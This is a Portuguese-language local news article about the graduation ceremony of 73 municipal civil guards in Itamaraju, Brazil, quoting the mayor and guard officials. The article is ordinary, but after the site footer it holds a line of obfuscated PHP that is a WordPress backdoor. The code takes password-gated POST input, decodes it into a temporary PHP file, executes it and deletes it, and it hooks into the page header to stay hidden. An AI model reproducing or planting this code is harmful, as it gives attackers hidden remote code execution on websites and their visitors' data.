• SEJA BEM-VINDO

Prefeitura de Itamaraju realiza formatura dos Guardas Civis Municipais

Publicado em: 14/03/2022 Atualizado:: março 14, 2022

Público prestigiou a cerimônia de formatura na praça Castelo Branco / Fotos: Região Notícias

 

 

A manhã deste domingo, 13 de março, foi marcada pela cerimônia de formatura dos novos Guardas Civis Municipais (GCMs), de Itamaraju, que reuniu o prefeito Marcelo Angênica (PSDB), vereadores, secretários municipais, autoridades civis e militares, além de familiares e amigos dos formandos. O evento aconteceu na praça Castelo Branco, fundos da Terminal Rodoviário e contou ainda com participação de grande público.

 

No total 73 guardas receberam seus Certificados de conclusão do curso. Desse total, três são mulheres. O uso de arma de fogo por esses agentes ainda está em análise. Durante a solenidade, houve desfile da tropa para as autoridades e o público presente.

 

O capitão Sidney Oliveira representou a major Kelly Ravani, comandante da 43ª CIPM. Na oportunidade o oficial recebeu da GCM uma placa de agradecimento e apoio na formação dos agentes.

 

O diretor da Guarda Civil, Paulo Maria, destacou que os formandos concluíram com brilhantismo o curso a que foram submetidos e ressaltou que o aprendizado e a troca de experiência nunca terminam. Lembrou a importância da Guarda para o município. “Sempre acreditei nesse projeto. A nossa luta é antiga e graças a Deus e o apoio do prefeito Marcelo Angênica, esse sonho está se tornando realidade. Quem ganha com isso, é a sociedade que vai contar com pessoas preparadas para contribuir com a manutenção da ordem pública”, falou.

 

 

Quem também participou da cerimônia foi o secretário de Administração, Léo Oss, que vem apoiando o projeto desde os primeiros momentos. Falou da sua contribuição para a realização da demanda da Guarda Civil. “Já faz um bom tempo que a gente vem conversando com Paulo Maria. Eu sempre acreditei que era possível a implantação da Guarda em Itamaraju. Temos certeza que o trabalho desses guardiões irá melhorar ainda mais a questão da segurança pública em nossa cidade”, destacou Oss.

 

O prefeito Marcelo Angênica rendeu homenagens aos presentes e fez questão de lembrar as cobranças feitas pelo diretor da Guarda Civil, Paulo Maria. “Foram inúmeras cobranças feitas por Paulo. Tivemos dezenas de reuniões até chegarmos à conclusão de que esse projeto era salutar para o município. Apoio porque sei que os nossos patrimônios serão bem guardados, além de outros trabalhos pertinentes. Parabéns a todos os envolvidos. A implantação da Guarda Civil é um marco histórico para Itamaraju”, ressaltou Angênica.

 

 

Segundo Paulo Maria, o Projeto de Lei que institucionaliza a Guarda Civil está sendo formatado e em breve será enviado à Câmara de Vereadores de Itamaraju. Após aprovado no Legislativo o projeto seguirá para sanção do prefeito Marcelo Angênica.

 

Fonte:Teixeirahoje


JORNAL INDEPENDENTE


Siga as redes sociais

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}